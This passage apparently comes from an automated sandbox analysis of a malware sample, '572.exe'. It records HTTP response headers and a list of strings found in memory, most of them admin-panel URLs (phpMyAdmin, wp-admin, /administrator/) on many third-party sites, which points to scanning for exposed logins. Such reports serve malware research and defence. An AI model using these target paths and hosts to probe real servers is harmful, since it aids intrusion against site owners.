                    Vary: Accept-Encoding
                    Server: cloudflare
                    CF-RAY: 850abd45bf6253b9-ATL
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wd%2B8JsgC3Td84n6iMZ6k%2Fapyj9BO%2F1FzrIZn6FWKLe%2Ff8nUOtk%2BwhkQVt2N40O8TRwDmVdYW0CtMQcdOnqxnH3dalpuc4mB3BDqTgFVh6C7Yh4tHph%2Bcx%2BNWH6j%2FmAfaXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd45bae21353-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 850abd45bec80705-ATLContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:16:06 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.0X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Date: Mon, 05 Feb 2024 11:16:06 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTSet-Cookie: __cf_bm=1iAg.jaqOry6c7AW1l9FRRQzGRAhyUaJmOXCMdnuwVs-1707131767-1-AXN1T055F/0qPV5xho0c5Hp5aAPUnzpxyaVcvCdaYwqNFgvDA63Qh9s5qsoOO8s0XQO1pfqrAc0csWoMqMsU+Ok=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pzltbOBqF8JXsnoSuIxq6Q7NGRv8VSvvRQDUYmzam%2FdfI6BX9U1pysWRxODqHpcxQ%2FvYvqajSs10Beljjk7pF0ijMV8Wp1r2lJ2AJx57o%2BH2q22TodC0XkofT04d7L37WA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd47d9197bd0-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0Date: Mon, 05 Feb 2024 11:15:21 GMTContent-Length: 1245
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTServer: nginx/1.23.4Content-Type: text/html; charset=UTF-8Content-Length: 0Vary: User-AgentSet-Cookie: PHPSESSID=6a863be9643b7bff70e69f550745b56e; path=/
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: dRlEpjkJUklYfdQGFcNjovzPcontent-language: pt-brContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 264Expires: Mon, 05 Feb 2024 11:16:07 GMTDate: Mon, 05 Feb 2024 11:16:07 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131767264_1611129006_213793778_15_8964_103_0_-";dur=1Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3bf2</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2xtjoY%2Bq6xVLdfqYqsmnDYxYp8SBSIYWvjLVaMgEtPOaG0I%2B9KfzttJbnHyOnKHyPtD5vvqHIUSRYDLYghBFfklgCocaRML8bWJXNa%2FObp8bhVqxhB97hoeF13wXHh2YA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd499f1b677b-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WShCCdEuIoeCetWXsBDmiHGqYSfQsGOsaR5pdJeyJbadfBSi7w%2FXKID1Y16zzUK7qxGwUAJLV%2F4LZLr7Dufyfj0LPNMn93Qpr8Co4RmCopJsxj3JBVyMmp5m2oCYrXMqZQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd499b504576-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-alivex-zone: 3-reserve101-ded7160CF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=MGzIcCHX4eKZdDwJDLWZxYq.eJQj2PLKrao.hMK0QLk-1707131767-1-AU9osYYGrdr2/kgnmMBLWJTNZX/3l+Z8EANxGU2bUm9wb1MeO4yIXLO1wblwe3Vwt7YTFtM8eBc26qPfWYy3O8E=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.bongacams.com; HttpOnly; SameSite=NoneServer: cloudflareCF-RAY: 850abd494a026783-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=c947e848ab0945a957bb6a68b5fec71d; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: lojRQpAHBgcontent-language: pt-brContent-Encoding: gzip
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: MEGA-Chrome-AntileakAccess-Control-Max-Age: 86400Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETDate: Mon, 05 Feb 2024 11:16:10 GMTContent-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 05 Feb 2024 11:16:07 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: keep-alive | CF-Cache-Status: DYNAMIC | Server: cloudflare | CF-RAY: 850abd49be49adcf-ATL | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: AkamaiGHost | Mime-Version: 1.0 | Content-Type: text/html | Content-Length: 269 | Expires: Mon, 05 Feb 2024 11:16:07 GMT | Date: Mon, 05 Feb 2024 11:16:07 GMT | Connection: close | Server-Timing: cdn-cache; desc=HIT | Server-Timing: edge; dur=1 | Server-Timing: ak_p; desc="1707131767601_1611129006_213793893_11_11593_136_0_-";dur=1 | Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin&#47;" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131767&#46;cbe3c65</BODY></HTML>
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 05 Feb 2024 11:16:07 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade | Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT | Accept-Ranges: bytes | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 836 | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/7.0 | X-Powered-By: ASP.NET | Access-Control-Allow-Origin: * | Date: Mon, 05 Feb 2024 11:16:06 GMT | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Date: Mon, 05 Feb 2024 11:16:07 GMT | Content-Type: text/html; charset=UTF-8 | Transfer-Encoding: chunked | Connection: keep-alive | X-Frame-Options: SAMEORIGIN | Referrer-Policy: same-origin | Cache-Control: max-age=15 | Expires: Mon, 05 Feb 2024 11:16:22 GMT | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v4L5oo9gz1LN%2BLS%2FGlzDuCvv5bsiUERbB%2F6alq9FXrZQoh9FFkoG3ciaq%2B8WI%2Fui8Z1LWkIkAMsRgAFE8Td2TcDdKulXyPM3B%2BRcPGRi2Gykuh%2BKKoub61DzSnFVmk9lIA%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Vary: Accept-Encoding | Server: cloudflare | CF-RAY: 850abd4b8b88b0bb-ATL | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | Date: Mon, 05 Feb 2024 11:15:21 GMT | Content-Length: 1245
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 05 Feb 2024 11:16:07 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: keep-alive | Vary: Accept-Encoding | Server: nginx/1.17.9 | X-Powered-By: PHP/8.2.4 | Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly | Expires: Thu, 19 Nov 1981 08:52:00 GMT | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 | Pragma: no-cache | Set-Cookie: osCsid=4a73d33f9165e0799029c407e7ebf71f; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None | x-imvu-rnd: AyJhOT | content-language: pt-br | Content-Encoding: gzip
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: keep-alive | Content-Encoding: gzip | Content-Type: text/html | Date: Mon, 05 Feb 2024 11:16:07 GMT | Etag: W/"613f221d-3feb" | Logid: 8900820139405424391 | Server: nginx | Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly; | Vary: Accept-Encoding | Vary: Accept-Encoding | X-Powered-By: BaiduCloud | Yld: 8900820139405424391 | Yme: ZIGW/y8rX0wSdTQEUmr/tG5LtOUfTwLrrgNFwSCLmQ== | Transfer-Encoding: chunked
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 05 Feb 2024 11:16:08 GMT | Server: Apache | Upgrade: h2,h2c | Connection: Upgrade | Last-Modified: Thu, 06 Oct 2022 20:52:18 GMT | Accept-Ranges: bytes | Vary: Accept-Encoding | Content-Encoding: gzip | Content-Length: 836 | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Server: Microsoft-IIS/10.0 | Date: Mon, 05 Feb 2024 11:15:23 GMT | Content-Length: 1245
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 05 Feb 2024 11:16:10 GMT Content-Length: 1245
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Mon, 05 Feb 2024 11:15:23 GMT Content-Length: 1245
                Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden Date: Mon, 05 Feb 2024 11:16:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Mon, 05 Feb 2024 11:16:26 GMT Set-Cookie: __cf_bm=cz6OvsiBACg0ZCMyEcNWjbl1FV6qUh4fJWLOzoM7ke4-1707131771-1-AeliCr4RJ4TDTW07imlxSGnq+BG0fXlLsV76PHmEnSJ4lQXHmOyeJ1m5RXtNVtKmhyZbaDR0hnTLhqC7yUEN9xg=; path=/; expires=Mon, 05-Feb-24 11:46:11 GMT; domain=.us04web.zoom.us; HttpOnly; SameSite=None Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UKcl7Cl4r4Qvs5PBdaVATklz6Oakkw9Ec0vq2wFiMZqKqfxHWlb479b8sRMYAPHB8KQH2TwQlNvRRKDsrVfcNGj4bOw0eyxinclL5h94ioo0%2F%2BWhB1f6xH7lp43xIohZKA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 850abd621c33b08e-ATL Content-Encoding: gzip alt-svc: h3=":443"; ma=86400
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Access-Control-Allow-Origin: * Access-Control-Allow-Headers: MEGA-Chrome-Antileak Access-Control-Max-Age: 86400 Connection: close
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: keep-alive Content-Encoding: gzip Content-Type: text/html Date: Mon, 05 Feb 2024 11:16:11 GMT Etag: W/"62650964-3feb" Logid: 8900821104636489671 P3p: CP=" OTI DSP COR IVA OUR IND COM " Server: nginx Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly; Set-Cookie: BAIDUID=68F91CB36893B7EB62E3CE0CD37C2F12:FG=1; expires=Tue, 04-Feb-25 11:16:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: BaiduCloud Yld: 8900821104636489671 Yme: ZIGW/y8rX0wSdTcES3b+qnFLvvIASADwtAFKxCqAkOm5 Transfer-Encoding: chunked
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 05 Feb 2024 11:16:14 GMT Content-Length: 1245
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 05 Feb 2024 11:16:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Server: nginx/1.17.9 X-Powered-By: PHP/8.2.4 Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: osCsid=3cfcf3297704242d99b2d5fe10204f22; expires=Mon, 04 Mar 2024 11:16:12 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None x-imvu-rnd: G4Ews4zi5F5r5dXKCGns Content-Encoding: gzip Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a Data Ascii: 14
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: keep-alive Content-Encoding: gzip Content-Type: text/html Date: Mon, 05 Feb 2024 11:16:12 GMT Etag: W/"62650964-3feb" Logid: 8900821477649888728 P3p: CP=" OTI DSP COR IVA OUR IND COM " Server: nginx Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly; Set-Cookie: BAIDUID=338AE0F115629B5ECE6D8E5A1004A3BC:FG=1; expires=Tue, 04-Feb-25 11:16:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: BaiduCloud Yld: 8900821477649888728 Yme: ZIGW/y8rX0QMaTUDUmr/tGtIovoZVAD0qgpNwySEne+xE0x0ZK/5Y6tb3A== Transfer-Encoding: chunked
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 05 Feb 2024 11:16:15 GMT Content-Length: 1245
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: keep-alive Content-Encoding: gzip Content-Type: text/html Date: Mon, 05 Feb 2024 11:16:13 GMT Etag: W/"62650964-3feb" Logid: 8900821692746961147 P3p: CP=" OTI DSP COR IVA OUR IND COM " Server: nginx Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly; Set-Cookie: BAIDUID=342CDDB632C0EDB874E5202F1BA7A945:FG=1; expires=Tue, 04-Feb-25 11:16:13 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: BaiduCloud Yld: 8900821692746961147 Yme: ZIGW/y8rX0sMajEFUmr/tG5Nv+UfTwfrrwBFwSCCnP+wTlk3OCccCoaD3A== Transfer-Encoding: chunked
                Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Connection: keep-alive Content-Encoding: gzip Content-Type: text/html Date: Mon, 05 Feb 2024 11:16:17 GMT Etag: W/"62650964-3feb" Logid: 8900822735141870389 P3p: CP=" OTI DSP COR IVA OUR IND COM " Server: nginx Set-Cookie: PANPSC=; expires=Fri, 01-Apr-1900 00:00:00 GMT; path=/; domain=pan.baidu.com; HttpOnly; Set-Cookie: BAIDUID=1773582DABE69F520ED57F4947DABDC1:FG=1; expires=Tue, 04-Feb-25 11:16:17 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 Vary: Accept-Encoding Vary: Accept-Encoding X-Powered-By: BaiduCloud Yld: 8900822735141870389 Yme: ZIGW/y8rV0UMaTQNUmr/tG1LteUfQwbrqwZPySKDnO8= Transfer-Encoding: chunked
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://analvids.com/administrator/L
                Source: 572.exe, 00000009.00000003.4579113128.0000000005634000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.cmrsanmartin.ziz.cl/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.cmrsanmartin.ziz.cl/administrator/A
                Source: 572.exe, 00000009.00000003.4306089773.000000004E6E6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304254421.0000000033369000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.cmrsanmartin.ziz.cl/administrator/index.php
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.cmrsanmartin.ziz.cl/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://api.cmrsanmartin.ziz.cl/phpmyadmin/N1rE
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/PhpMyAdmin/.php
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/PhpMyAdmin/min/
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/admin.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/administrator/
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/administrator/o
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/phpMyAdmin/L
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005660000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/phpmyadmin/m
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/wp-admin/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/wp-admin/hp
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.jobpet.com.br/wp-admin/m.brSx
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://app.plex.tv/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4304769446.0000000040257000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
                Source: 572.exe, 00000009.00000003.4304769446.0000000040321000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4003323359.00000000390C6000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4163206048.0000000040178000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4070644791.0000000064048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c3
                Source: 572.exe, 00000009.00000003.4003323359.000000003911E000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4199132686.000000003911E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7cI
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/PhpMyAdmin/
                Source: 572.exe, 00000009.00000003.4579113128.0000000005642000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/PhpMyAdmin/ed
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/admin
                Source: 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4308254495.0000000031616000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/admin.php
                Source: 572.exe, 00000009.00000003.4464339832.000000004D81C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/administrator/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/administrator/index.php
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/administrator/index.phpm
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/administrator/index.phpr
                Source: 572.exe, 00000009.00000003.4347804108.000000004E509000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/adminl
                Source: 572.exe, 00000009.00000003.4306089773.000000004E70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/adminr/
                Source: 572.exe, 00000009.00000003.4390567048.0000000039205000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/phpMyAdmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4521192060.000000004E5B4000.00000004.00000020.00020000.00000000.sdmp, 572.exe, 00000009.00000003.4309603552.000000004E5B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/phpmyadmin/
                Source: 572.exe, 00000009.00000003.4404017123.000000004E792000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://auth.cambridgelms.org/phpmyadmin/5
